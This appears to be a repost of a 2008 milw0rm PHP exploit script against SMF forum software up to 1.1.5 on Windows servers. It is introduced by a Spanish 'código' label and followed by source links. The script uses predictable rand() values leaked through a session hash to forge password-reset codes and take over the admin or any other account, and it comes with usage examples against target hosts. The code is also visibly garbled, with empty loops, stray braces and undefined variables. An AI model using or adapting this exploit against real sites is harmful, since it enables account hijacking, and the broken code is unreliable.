código:
Código
<?php echo "---------------------------------------------------------------\n"; echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)\n"; echo "(c)oded by Raz0r (http://Raz0r.name/)\n"; echo "---------------------------------------------------------------\n"; if ($argc<3) { echo "USAGE:\n"; echo "~~~~~~\n"; echo "php {$argv[0]} [host] [path] OPTIONS\n\n"; echo "[host] - target server where SMF is installed\n"; echo "[path] - path to SMF\n\n"; echo "OPTIONS:\n"; echo "--userid=[value] (default: 1)\n"; echo "--username=[value] (default: admin)\n"; echo "examples:\n"; echo "php {$argv[0]} site.com /forum/\n"; echo "php {$argv[0]} site.com / --userid=2 --username=odmen\n"; die; } /** * Software site: http://www.simplemachines.org * * SMF leaks current state of random number generator through hidden input parameter `sc` * of the password reminder form: * * $_SESSION['rand_code'] = md5(session_id() . rand()); * $sc = $_SESSION['rand_code']; * * Since max random number generated with rand() on win32 is 32767 and session id * is known an attacker can reverse the md5 hash and get the random number value. * On win32 every random number generated with rand() is used as a seed for the next * random number. So if SMF is installed on win32 platform an attacker can predict * all the next random numbers. When password reset is requested SMF uses rand() * function to generate validation code: * * $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10); * * So prediction of the validation code is possible and an atacker can set his * own password for any user. * * More information about random number prediction: * http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ * * More information about the behaviour of rand() on win32 (in Russian): * http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/ */ $host = $argv[1]; $path = $argv[2]; for($i=3;$i<=$argc;$i++){ } } } echo "[~] Connecting to $host ... "; $packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Cookie: PHPSESSID=$sess;\r\n"; $packet.= "Keep-Alive: 300\r\n"; $packet.= "Connection: keep-alive\r\n\r\n"; $md5 = $out[1]; break; } } if($md5) { $seed = getseed($md5); if($seed) { echo "[+] Seed for next random number is $seed\n"; } function getseed($md5) { global $sess; for($i=0;$i<=32767;$i++){ return $i; } } } $packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n"; $packet.= "Host: {$host}\r\n"; $packet.= "Cookie: PHPSESSID=$sess;\r\n"; $packet.= "Connection: close\r\n"; $packet.= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet.= $data; $resp=''; } } } for($i=0;$i<6;$i++){ } echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n"; ?> # milw0rm.com [2008-09-06]
Fuentes:
http://milw0rm.com/exploits/6392
http://www.jccharry.com/blog/2008/09/07/whk_vulnerabilidad-en-sistema-de-foros-smf-115-y-versiones-anteriores.html